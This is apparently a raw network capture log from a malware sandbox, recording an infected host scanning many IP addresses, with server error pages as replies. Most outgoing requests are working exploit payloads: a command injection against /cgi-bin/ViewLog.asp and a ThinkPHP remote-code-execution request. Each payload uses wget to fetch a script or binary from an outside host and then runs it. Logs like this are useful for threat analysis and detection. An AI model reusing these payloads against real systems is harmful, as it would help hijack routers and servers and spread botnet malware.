Feb 14, 2024 09:31:10.910819054 CET	979	IN	HTTP/1.1 404 Content-Type: text/html;charset=utf-8 Content-Language: en Content-Length: 783 Date: Wed, 14 Feb 2024 08:31:10 GMT Keep-Alive: timeout=20 Connection: keep-alive Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 5b 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 5d 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 39 2e 30 2e 34 33 20 28 44 65 62 69 61 6e 29 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [/cgi-bin/ViewLog.asp] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/9.0.43 (Debian)</h3></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1005	192.168.2.15	40286	95.86.97.11	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:10.764213085 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1006	192.168.2.15	55822	31.7.79.69	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:10.878576994 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1007	192.168.2.15	44412	94.187.181.186	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:10.997220993 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1008	192.168.2.15	48634	88.221.180.119	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:11.284538984 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:11.474150896 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:31:11 GMT Date: Wed, 14 Feb 2024 08:31:11 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 65 33 33 65 31 32 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 34 37 31 26 23 34 36 3b 32 64 63 63 66 65 38 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.e33e1202.1707899471.2dccfe8e</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1009	192.168.2.15	41906	94.125.165.133	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:11.453191042 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:11.651920080 CET	534	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:31:11 GMT Server: Apache/2.4.57 (Debian) mod_fcgid/2.3.9 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1010	192.168.2.15	45238	85.214.74.49	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:11.474347115 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:11.693643093 CET	1156	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:31:11 GMT Server: Apache Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' ssh: rdp:; img-src 'self' data: https://*.tile.openstreetmap.org/ ; connect-src 'self' https://crash.checkmk.com/ https://license.checkmk.com/api/verify; frame-ancestors 'self' ; base-uri 'self'; form-action 'self' javascript: 'unsafe-inline'; object-src 'self'; worker-src 'self' blob: Permissions-Policy: accelerometer=(), autoplay=(), camera=(), encrypted-media=(), fullscreen=(), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), picture-in-picture=(), usb=() X-Frame-Options: sameorigin X-XSS-Protection: 1; mode=block X-Permitted-Cross-Domain-Policies: none Referrer-Policy: origin-when-cross-origin X-Content-Type-Options: nosniff Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
1011	192.168.2.15	41794	62.29.44.25	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:11.503611088 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1012	192.168.2.15	56658	94.122.73.178	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:11.504997015 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1013	192.168.2.15	41292	95.10.61.239	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:11.511392117 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1014	192.168.2.15	55226	62.150.141.245	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:11.536650896 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:11.816838980 CET	109	IN	HTTP/1.1 302 Found Location: https://192.168.0.14:443/cgi-bin/ViewLog.asp Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
1015	192.168.2.15	59660	85.122.205.9	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:11.580451012 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1016	192.168.2.15	48920	94.110.172.137	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:11.590437889 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1017	192.168.2.15	46166	31.136.48.210	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:11.599473953 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:12.279130936 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:13.623089075 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:16.375042915 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:21.751105070 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:32.502609968 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:55.030227900 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1018	192.168.2.15	41940	94.121.48.12	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:11.626446009 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1019	192.168.2.15	56244	94.122.2.242	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:11.626777887 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
1020	192.168.2.15	49842	94.120.163.190	8080

Timestamp	Bytes transferred	Direction	Data
